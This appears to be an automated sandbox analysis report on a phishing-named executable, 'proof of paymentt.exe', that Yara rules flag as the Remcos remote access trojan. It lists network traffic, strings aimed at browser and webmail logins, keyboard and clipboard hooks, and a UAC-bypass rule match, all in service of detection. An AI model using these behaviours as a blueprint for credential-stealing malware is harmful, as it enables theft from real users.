Source: proof of paymentt.exe, 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: geoplugin.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: unknown

HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A410900D492X-BM-CBT: 1696428841X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 120X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A410900D492X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticshX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 2484Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1714728042053&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF

Source: bhv934F.tmp.16.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv934F.tmp.16.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv934F.tmp.16.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv934F.tmp.16.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv934F.tmp.16.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: proof of paymentt.exe, 00000007.00000002.4459053674.0000000001379000.00000004.00000020.00020000.00000000.sdmp, proof of paymentt.exe, 00000007.00000002.4458667961.0000000001320000.00000004.00000020.00020000.00000000.sdmp, mQpdTSxCjbPop.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: proof of paymentt.exe, 00000000.00000002.2038684853.000000000498E000.00000004.00000800.00020000.00000000.sdmp, proof of paymentt.exe, 00000000.00000002.2038684853.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, mQpdTSxCjbPop.exe, 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: proof of paymentt.exe, 00000007.00000002.4459053674.0000000001379000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp6
Source: proof of paymentt.exe, 00000007.00000002.4459053674.0000000001379000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpv
Source: proof of paymentt.exe, 00000007.00000002.4459053674.0000000001379000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpx
Source: bhv934F.tmp.16.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: proof of paymentt.exe, 00000000.00000002.2037579032.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, mQpdTSxCjbPop.exe, 00000009.00000002.2065439154.0000000002F79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: proof of paymentt.exe, proof of paymentt.exe, 00000013.00000002.2190949329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: proof of paymentt.exe, proof of paymentt.exe, 00000013.00000002.2190949329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: proof of paymentt.exe, 00000013.00000002.2190949329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: proof of paymentt.exe, 00000013.00000002.2190949329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: proof of paymentt.exe, 00000010.00000002.2199005782.00000000009D2000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: proof of paymentt.exe, 00000013.00000002.2190949329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: proof of paymentt.exe, 00000010.00000002.2199391458.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, chp960F.tmp.16.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: proof of paymentt.exe, 00000010.00000002.2199391458.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, chp960F.tmp.16.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: proof of paymentt.exe, 00000010.00000002.2199391458.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, chp960F.tmp.16.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: proof of paymentt.exe, 00000010.00000002.2199391458.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, chp960F.tmp.16.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: proof of paymentt.exe, 00000010.00000002.2199391458.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, chp960F.tmp.16.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: proof of paymentt.exe, 00000010.00000002.2199391458.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, chp960F.tmp.16.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: proof of paymentt.exe, 00000010.00000002.2199391458.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, chp960F.tmp.16.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: proof of paymentt.exe, 00000010.00000002.2199391458.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: proof of paymentt.exe, 00000010.00000002.2199391458.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: proof of paymentt.exe, 00000010.00000002.2199340161.0000000000D0D000.00000004.00000020.00020000.00000000.sdmp, proof of paymentt.exe, 00000010.00000002.2199391458.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: proof of paymentt.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: proof of paymentt.exe, 00000010.00000002.2199391458.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, chp960F.tmp.16.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: proof of paymentt.exe, proof of paymentt.exe, 00000013.00000002.2190949329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: proof of paymentt.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: proof of paymentt.exe, 00000010.00000002.2199391458.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, chp960F.tmp.16.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 104.126.112.149:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.126.112.149:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49733 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: 12_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000

12_2_0040A2B8

Installs a global keyboard hook

Source: C:\Users\user\Desktop\proof of paymentt.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\proof of paymentt.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: 12_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,

12_2_0040B70E

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	12_2_004168C1
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	16_2_0040987A
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	16_2_004098E2
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	17_2_00406DFC
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	17_2_00406E9F
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	19_2_004068B5
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	19_2_004072B5

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: 12_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,

12_2_0040B70E

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: 12_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

12_2_0040A3E0

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 12.2.mQpdTSxCjbPop.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mQpdTSxCjbPop.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.401a868.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.498ecc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.498ecc8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proof of paymentt.exe.401a868.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2044389940.0000000000D9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2038684853.000000000498E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4459314039.0000000002EDF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4458667961.0000000001320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4458472507.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2038684853.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: proof of paymentt.exe PID: 6500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: proof of paymentt.exe PID: 6112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mQpdTSxCjbPop.exe PID: 6256, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: 12_2_0041C9E2 SystemParametersInfoW,

12_2_0041C9E2

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.2.mQpdTSxCjbPop.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.mQpdTSxCjbPop.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.mQpdTSxCjbPop.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.mQpdTSxCjbPop.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.mQpdTSxCjbPop.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.mQpdTSxCjbPop.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.proof of paymentt.exe.401a868.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.proof of paymentt.exe.401a868.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.proof of paymentt.exe.401a868.3.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.proof of paymentt.exe.498ecc8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.proof of paymentt.exe.498ecc8.4.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.proof of paymentt.exe.498ecc8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.proof of paymentt.exe.498ecc8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.proof of paymentt.exe.498ecc8.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.proof of paymentt.exe.498ecc8.4.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.proof of paymentt.exe.401a868.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.proof of paymentt.exe.401a868.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.2038684853.000000000498E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.2038684853.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: proof of paymentt.exe PID: 6500, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: mQpdTSxCjbPop.exe PID: 6256, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

.NET source code contains very large array initializations

Source: proof of paymentt.exe, Program.cs

Large array initialization: : array initializer size 917067

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: proof of paymentt.exe

Source: C:\Users\user\Desktop\proof of paymentt.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	16_2_0040DD85
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_00401806 NtdllDefWindowProc_W,	16_2_00401806
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_004018C0 NtdllDefWindowProc_W,	16_2_004018C0
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_004016FD NtdllDefWindowProc_A,	17_2_004016FD
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_004017B7 NtdllDefWindowProc_A,	17_2_004017B7
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_00402CAC NtdllDefWindowProc_A,	19_2_00402CAC
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_00402D66 NtdllDefWindowProc_A,	19_2_00402D66

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: 12_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,

12_2_004167B4

Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 0_2_00D0E054	0_2_00D0E054
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 0_2_02BCF146	0_2_02BCF146
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 0_2_02BD0006	0_2_02BD0006
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 0_2_02BD0040	0_2_02BD0040
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 0_2_06E12280	0_2_06E12280
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 0_2_06E1D660	0_2_06E1D660
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 0_2_06E16528	0_2_06E16528
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 0_2_06E15288	0_2_06E15288
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 0_2_06E17300	0_2_06E17300
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 0_2_06E17310	0_2_06E17310
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 0_2_06E14E50	0_2_06E14E50
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 0_2_06E16960	0_2_06E16960
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 0_2_07A70D80	0_2_07A70D80
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 0_2_07A7E6E8	0_2_07A7E6E8
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 0_2_07A78EC0	0_2_07A78EC0
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 0_2_07A7CD38	0_2_07A7CD38
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 0_2_07A72500	0_2_07A72500
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 0_2_07A724F0	0_2_07A724F0
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 0_2_07A72168	0_2_07A72168
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 0_2_07A72178	0_2_07A72178
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 7_2_10017194	7_2_10017194
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 7_2_1000B5C1	7_2_1000B5C1
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_013EE054	9_2_013EE054
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_05430040	9_2_05430040
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_05430006	9_2_05430006
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_07330D80	9_2_07330D80
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_0733E6E8	9_2_0733E6E8
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_07338EC0	9_2_07338EC0
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_0733CD38	9_2_0733CD38
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_07332500	9_2_07332500
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_073324F0	9_2_073324F0
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_07332178	9_2_07332178
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_07332168	9_2_07332168
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_073B2280	9_2_073B2280
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_073B4E1A	9_2_073B4E1A
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_073B4E50	9_2_073B4E50
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_073B6528	9_2_073B6528
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_073B7310	9_2_073B7310
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_073B7300	9_2_073B7300
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_073B5288	9_2_073B5288
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_073BC908	9_2_073BC908
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_073B6960	9_2_073B6960
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0043E0CC	12_2_0043E0CC
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0041F0FA	12_2_0041F0FA
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00454159	12_2_00454159
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00438168	12_2_00438168
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_004461F0	12_2_004461F0
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0043E2FB	12_2_0043E2FB
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0045332B	12_2_0045332B
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0042739D	12_2_0042739D
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_004374E6	12_2_004374E6
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0043E558	12_2_0043E558
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00438770	12_2_00438770
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_004378FE	12_2_004378FE
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00433946	12_2_00433946
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0044D9C9	12_2_0044D9C9
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00427A46	12_2_00427A46
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0041DB62	12_2_0041DB62
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00427BAF	12_2_00427BAF
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00437D33	12_2_00437D33
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00435E5E	12_2_00435E5E
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00426E0E	12_2_00426E0E
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0043DE9D	12_2_0043DE9D
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00413FCA	12_2_00413FCA
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00436FEA	12_2_00436FEA
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_0044B040	16_2_0044B040
